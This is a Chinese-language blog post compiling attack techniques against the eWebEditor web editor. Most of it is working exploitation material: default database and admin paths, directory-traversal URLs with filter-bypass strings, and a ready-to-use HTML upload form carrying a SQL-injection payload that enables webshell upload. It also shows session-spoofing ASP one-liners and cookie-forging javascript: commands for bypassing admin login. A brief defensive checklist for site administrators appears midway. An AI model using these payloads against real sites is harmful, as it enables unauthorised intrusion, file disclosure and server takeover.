欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Ewebeditor 的一些漏洞总结 推荐

程序员文章站 2022-04-07 10:09:05
Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功能强大颇收使用者喜爱,在国内使用极为广泛。... 10-05-13...
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者minghacker总结前人基础,一一道来。

对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:

默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),

no1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb
默认的后台路径是admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问

举例
有个细节需要注意:

有抄袭版的;southidceditor
数据库southidceditor\datas\southidceditor.mdb
没登陆页面。
利用方法:popup.asp页面传图片小马,nc提交,得shell
no2.遍历目录漏洞(具体如下):
登陆编辑器---上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
此漏洞危害大大的,绝对恐怖

no3.当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell

no4.有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的asp、asa后缀样式表,也就是虽说的踩着脚印入侵。
还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb

no5.注入2.1.6的注入就不多说了,如下保存为html文件修改action,直接上传cer马

<h1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</h1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=image&style=luoye' union select s_id,s_name,s_dir,s_css,s_uploaddir,s_width,s_height,s_memo,s_issys,s_fileext,s_flashext, [s_imageext]%2b'|cer',s_mediaext,s_filesize,s_flashsize,s_imagesize,s_mediasize,s_stateflag,s_detectfromword,s_initmode,s_baseurl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=fuck>
</form>

有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
简单利用就是
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

默认表名:ewebeditor_system默认列名:sys_username、sys_userpass,然后利用nbsi进行猜解,对此进行注入取得账号密码

no6.有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:

在action下面
<form action="" >>
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type="submit" name="uploadfile" value="提交">
<input type=hidden name=originalfile value="">
</form>
------------------------------------------------------------------------------------------------------------------------------------------------
<input type="submit" name="uploadfile" value="提交"> 放在action后头
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=asa&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有asa才可以传得上。

no.7还有种方式是最近坏客发现的
利用webeditor session欺骗漏洞,进入后台:
漏洞文件:admin_private.asp
漏洞语句:

<%
if session("ewebeditor_user") = "" then
response.redirect "admin_login.asp"
response.end
end if

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个amxking.asp内容如下:

<%session("ewebeditor_user") = "11111111"%>

访问amxking.asp,再访问后台任何文件,for example:admin_default.asp

  面对此种威胁网站管理员应该做好如下的防范措施:
  1、使用了ewebeditor编辑器的网站,应及时修改该编辑器的默认数据库路径和后缀名,建议数据库多方几层目录,防止数据库被黑客非法下载
  2、修改编辑器后台登陆路径和默认的登陆用户名和密码,防止黑客进入后台管理界面
  3、对upload.asp语句进行修改,防止黑客利用其上传asp木马从而获得web权限
4、及时对网站服务器iis配置中的应用程序扩展名映射进行整理,确保其它类型的文件不能在服务器网站上运行
ewebeditor 5.2 列目录漏洞

出现漏洞的文件存在于ewebeditor/asp/browse.asp

asp/visual basic代码
function getlist()
dim s_list, s_url
s_list = ""
dim ofso, ouploadfolder, ouploadfiles, ouploadfile, sfilename
'response.write scurrdir
'on error resume next
set ofso = server.createobject("scripting.filesystemobject")
set ouploadfolder = ofso.getfolder(server.mappath(scurrdir))
'注意一下scurrdir变量,这个值等下我们可以用到
if err.number>0 then
s_list = ""
exit function
end if

if sdir <> "" then
if instrrev(sdir, "/") > 1 then
s_url= left(sdir, instrrev(sdir, "/") - 1)
else
s_url = ""
end if

s_list = s_list & "" & _
"" & _
".." & _
" " & _
""
end if
'response.write sdir&"!"&s_list

dim osubfolder
for each osubfolder in ouploadfolder.subfolders
'response.write ouploadfolder.subfolders
if sdir = "" then
s_url = osubfolder.name
else
s_url = sdir & "/" & osubfolder.name
end if
s_list = s_list & "" & _
"" & _
"" & osubfolder.name & "" & _
" " & _
""
next
'response.write s_list

set ouploadfiles = ouploadfolder.files

for each ouploadfile in ouploadfiles
'response.write ouploadfile.name
sfilename = ouploadfile.name
if checkvalidext(sfilename) = true then
'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
if sdir = "" then
s_url = scontentpath & sfilename
else
s_url = scontentpath & sdir & "/" & sfilename
end if

s_list = s_list & "" & _
"" & filename2pic(sfilename) & "" & _
"" & sfilename & "" & _
"" & getsizeunit(ouploadfile.size) & "" & _
""
end if
next
set ouploadfolder = nothing
set ouploadfiles = nothing
'response.write server.htmlencode(s_list)&"!"&s_url

if sdir = "" then
s_url = ""
's_url = "/"
else
s_url = "/" & sdir & ""
's_url = "/" & sdir & "/"
end if

s_list = s_list & ""
s_list = html2js(s_list)
'response.write server.htmlencode(s_list)&"!"&s_url
s_list = "parent.setdirlist(""" & s_list & """, """ & s_url & """)"
getlist = s_list
end function
'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
function checkvalidext(s_filename)
if sallowext = "" then
checkvalidext = true
exit function
end if

dim i, aext, sext
sext = lcase(mid(s_filename, instrrev(s_filename, ".") + 1))
checkvalidext = false
aext = split(lcase(sallowext), "|")
for i = 0 to ubound(aext)
if aext(i) = sext then
checkvalidext = true
exit function
end if
next
end function
'我们顺着代码往下找,发现scurrdir的值是通过下面的值得到的
sub initparam()
stype = ucase(trim(request.querystring("type")))
sstylename = trim(request.querystring("style"))

dim i, astyleconfig, bvalidstyle
bvalidstyle = false
for i = 1 to ubound(astyle)
astyleconfig = split(astyle(i), "|||")
if lcase(sstylename) = lcase(astyleconfig(0)) then
bvalidstyle = true
exit for
end if
next

if bvalidstyle = false then
outscript("alert('invalid style.')")
end if

sbaseurl = astyleconfig(19)
'nallowbrowse = clng(astyleconfig(43))
nallowbrowse = 1

if nallowbrowse <> 1 then
outscript("alert('do not allow browse!')")
end if

suploaddir = astyleconfig(3)
if left(suploaddir, 1) <> "/" then
select case stype
case "remote"
suploaddir = "../../" & suploaddir & "image/"
case "file"
suploaddir = "../../" & suploaddir & "other/"
case "media"
suploaddir = "../../" & suploaddir & "media/"
case "flash"
suploaddir = "../../" & suploaddir & "flash/"
case else
suploaddir = "../../" & suploaddir & "image/"
end select
end if
'suploaddir =suploaddir &"/"

select case sbaseurl
case "0"
'scontentpath = astyleconfig(23)
select case stype
case "remote"
scontentpath = "../" & astyleconfig(3) & "image/"
case "file"
scontentpath = "../" & astyleconfig(3) & "other/"
case "media"
scontentpath = "../" & astyleconfig(3) & "media/"
case "flash"
scontentpath = "../" & astyleconfig(3) & "flash/"
case else
scontentpath = "../" & astyleconfig(3) & "image/"
end select
case "1"
scontentpath = relativepath2rootpath(suploaddir)
case "2"
scontentpath = rootpath2domainpath(relativepath2rootpath(suploaddir))
end select

select case stype
case "remote"
sallowext = astyleconfig(10)
case "file"
sallowext = astyleconfig(6)
case "media"
sallowext = astyleconfig(9)
case "flash"
sallowext = astyleconfig(7)
case else
sallowext = astyleconfig(8)
end select

scurrdir = suploaddir '注意这里,这个是得到了配置的路径地址
sdir = trim(request("dir")) '得到dir变量
sdir = replace(sdir, "\", "/") '对dir变量进行过滤
sdir = replace(sdir, "../", "")
sdir = replace(sdir, "./", "")
if sdir <> "" then
if checkvaliddir(server.mappath(suploaddir & sdir)) = true then
scurrdir = suploaddir & sdir & "/"
'重点就在这里了,看到没有,当suploaddir & sdir存在的时候,scurrdir就为suploaddir & sdir的值了
'虽然上面对sdir进行了过滤,不过我们完全可以跳过.具体利用st0p会在下面的利用中给出
else
sdir = ""
end if
end if

end sub


嘿嘿,看到这你应该明白了,其实就是对dir过滤的问题,我们完全可以构造特殊的值来跳过验证,这样就可以得到目录结构和显示设置文件中允许的文件后缀的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了.
嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了吗,里面就有你根目录的目录名字了.
嘿嘿,他根目录下有个guest目录,我们通过下面的地址可以列出他下面的结构
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我们也可以通过
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上层跳,我测试的那个虚拟主机,得到的是www,logfile,datebase这三个目录.


ewebeditorv5.5asp存在session欺骗漏洞!
记得以前ewebeditor在线编辑器有个session欺骗漏洞没想到5.5版本也存在!

代码如下:

'登录检查
function chklogin()
if session("editor_admin")="" or isnull(session("editor_admin")) then
phillogin()
session.codepage = session("precodepage")
response.end
end if
end function

呵呵很明显和以前的版本漏洞一样!

只是判断了session.

利用方法:

新建立个hkok8.asp内容为

<%session("editor_admin") = "admin"%>

然后访问hkok8.asp 最后访问登陆文件.刷新ok进去了...

要进行这种session欺骗,必须有三个前提:

1.进行欺骗的网页和被欺骗的网页必须位于同一个网站内.
2.必须知道管理页面。
3.必须知道session变量以及它的限制条件。

php版ewebeditor 3.8的漏洞

php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:

1 首先当然要找到登陆后台,默认是../ewebeditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1′));后三次回车,
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了

3 后面的利用和asp一样,新增样式修改上传,就ok了

测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的shell文件,在浏揽器输入javascript:lbtnupload.click();就能得到shell
jsp的上传漏洞以及那个出了n久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
哈哈,以后只要ewebeditor的后台可以找到的话,就可以通杀了 所以这个漏洞还是比较酷,建议收藏